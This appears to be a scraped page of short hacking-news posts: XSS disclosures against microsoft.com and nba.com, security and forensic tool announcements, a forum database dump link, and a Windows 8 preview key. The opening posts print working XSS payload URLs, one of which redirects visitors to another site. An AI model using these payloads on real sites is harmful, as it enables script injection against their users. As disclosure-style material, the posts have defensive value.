Microsoft official website(micrsoft.com) is vulnerable to Cross Site Scripting (XSS). The vulnerability is in the Products page url.

hxxp://www.microsoft.com/en-us/together/possibilities.aspx
?hdrFo=mthdr02'"-->alert('XSS');document.location.replace('http://ehackingnews.com')http://www.microsoft.com/en-us/together/possibilities.aspx
?hdrFo=mthdr02'"-->3Ealert('Simple XSS')

Code
hxxp://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"-->alert("XSS")

by
flexxpoint

Mozilla Firefox has launched a new add-on called Collusion that enable users to see which advertisers are tracking their movements on the web.
Collusion is an experimental add-on for Firefox and allows you to see all the third parties that are tracking your movements across the Web. It will show, in real time, how that data creates a spider-web of interaction between companies and other trackers.

by
ahaseckaser

Joonas Pihlajamaa a programmer who solved this issue by using a USB HID stick that types a password stored in EEPROM, The device may also generate a new password with 10 characters by only typing the CAPS button which will help in getting a new password in a fast way without need to remember it. The programmer used an old 512 MB flash drive.



Download Source
http://codeandlife.com/data/usb_passgen.zip

Adobe® SWF Investigator is the only comprehensive, cross-platform, GUI-based set of tools, which enables quality engineers, developers and security researchers to quickly analyze SWF files to improve the quality and security of their applications. With SWF Investigator, you can perform both static and dynamic analysis of SWF applications with just one toolset. SWF Investigator lets you quickly inspect every aspect of a SWF file from viewing the individual bits all the way through to dynamically interacting with a running SWF.

Download
http://labs.adobe.com/technologies/swfinvestigator/

Latest Database pruned of any information can be found here ...
http://www.hackhound.org/HH-DB-2012-03-05.zip
IPB attachments here ...
http://www.hackhound.org/ipb-files
SMF attachments here (old forum) ...
http://www.hackhound.org/smf-files

Google and MIT are pleased to announce the initial free and open-source release from Google of the App Inventor source code

Download
http://code.google.com/p/app-inventor-releases/downloads/list

Wiki Linux Mac
http://code.google.com/p/app-inventor-releases/wiki/BuildingAndRunning
1. Clone the Source! 2. Install dev-java/ant 3. Goto Appinventor-Dir bash: ant 4. bash: ant tests 5. Start the AppEngine Java Service (Download here: http://code.google.com/intl/de-DE/appengine/downloads.html#Download_the_Google_App_Engine_SDK) 6. bash: RunLocalBuildServer!

Wiki Windows
http://sites.jsoft.com/appinventor/home/gsuac/server/settingup/gsuar#TOC-your-war-folder

Only 7 of the 41 virus scanners had detection rates above 90 percent, with over half of the remaining apps having detection rates under 40 percent. The top 7 apps were Avast Mobile Security, Dr. Web Anti-virus Light, F-Secure Mobile Security, IKARUS Mobile Security Lite, Lookout Mobile Security, Kaspersky Mobile Security Lite, and Zoner AntiVirus Free. Out of those 7, Kaspersky and F-Secure had the highest detection rates, followed by Avast.

Info
http://www.pcworld.com/businesscenter/article/251345/which_android_security_tools_are_worth_your_time.html

Details:
Parameter successURL in /webAction?actionId=emailFormRandom^Name=&Email=&Comment=&=Submit&=Reset&ReferringURL=&emailTo=technicalsupport%40nba.com&emailFrom=technicalsupport%40nba.com&successURL=%2F&subject=NBA.com+404+Error+Message is vulnerable to "+onerror="alert(1)" XSS input.

Proof Of Concept:
hxxp://www.nba.com:80/webAction?actionId=emailFormRandom

oSpy is a tool which aids in reverse-engineering software running on the Windows platform.
oSpy already intercepts one such API, and is the API used by MSN Messenger, Google Talk, etc. for encrypting/decrypting HTTPS data.

Download
http://code.google.com/p/ospy/downloads/list

Microsoft has created Computer Online Forensic Evidence Extractor (COFEE), designed exclusively for use by law enforcement agencies. COFEE brings together a number of common digital forensics capabilities into a fast, easy-to-use, automated tool for first responders. And COFEE is being provided—at no charge—to law enforcement around the world.

With COFEE, law enforcement agencies without on-the-scene computer forensics capabilities can now more easily, reliably, and cost-effectively collect volatile live evidence. An officer with even minimal computer experience can be tutored—in less than 10 minutes—to use a pre-configured COFEE device. This enables the officer to take advantage of the same common digital forensics tools used by experts to gather important volatile evidence, while doing little more than simply inserting a USB device into the computer.

Info
http://www.microsoft.com/industry/government/solutions/cofee/default.aspx

Besides the general data extracted by similar products, Oxygen Forensic Suite can extract a lot of unique information

Using low-level protocols allows the program to extract: phone basic information and SIM-card data, contacts list, caller groups, speed dials, missed/outgoing/incoming calls, standard SMS/MMS/E-mail folders, custom SMS/MMS/E-mail folders, deleted SMS messages (with some restrictions) , SMS Center timestamps, calendar events schedule, tasks, text notes, photos, videos, sounds, LifeBlog data (all main phone events with their geographical coordinates), Java applications, file system from phone memory and flash card, GPRS and Wi-Fi activity, voice records and much more. The list of supported features depends on a certain phone model

Download
http://www.oxygen-forensic.com/de/download/

Backtrack 5 R2 finally released with bug fixes, upgrades, and the addition of 42 new tools. With the best custom-built 3.2.6 kernel, the best wireless support available at maximum speed. This release have included Metasploit 4.2.0 Community Edition, version 3.0 of the Social Engineer Toolkit, BeEF 0.4.3.2, and many other tool upgrades.

Download
http://www.backtrack-linux.org/downloads/

Security Analyzer is a free program for the Windows operating system to assess the system’s security status. The application works in some regards identical to Microsoft’s Action Center control panel applet. Unlike Microsoft’s built-in tool, it provides additional information and options to see if the system is protected properly.

Download
http://www.itknowledge24.com/downloads/p

Ocster Backup Pro is a fully automatic backup solution that supports full PC backup (image backup), file backup, email backup (Outlook, Thunderbird), browser backup (Firefox, Chrome, Internet Explorer), contacts backup. The application is very easy-to-use and includes wizard that guides users with no knowledge or new to backup programs to perform the desired tasks effectively. Backup performed by Ocster Backup pro can be stored on local drives, removable drives or on secure Ocster backup servers.

Info:
Visit promo page
https://www.ocster.com/unlock/obp7/en?edt=cbde11a
Enter your details
You will receive a confirmation mail

brEWS (Basic Request Embedded Web Server Scanner) was designed to provide a simple web based tool to scan networks and identify Embedded Web Servers (EWSs). While there is no universally accepted definition, for our purposes, we define an EWS as follows:

Web server installed on the hardware during the manufacturing process (not an optional component)
Not designed for high performance
Limited functionality
Serves as an administrative interface to the host hardware

Info
http://brews.zscaler.com/getheaders.php

Download ISO-Images
Englisch

64-Bit (x64) (3,1 GB) Sha 1 Hash – 1288519C5035BCAC83CBFA23A33038CCF5522749
http://iso.esd.microsoft.com/WCPDL/BD1B8A49393E30CC9C4E5C88457D73E964F1F3B18/Windows8-ConsumerPreview-64bit-English.iso

32-Bit (x86) (2,3 GB) Sha 1 Mash – E91ED665B01A46F4344C36D9D88C8BF78E9A1B39
http://iso.esd.microsoft.com/WCPDL/BD1B8A49393E30CC9C4E5C88457D73E964F1F3B18/Windows8-ConsumerPreview-32bit-English.iso

Product Key: DNJXJ-7XBW8-2378T-X22TX-BKG7J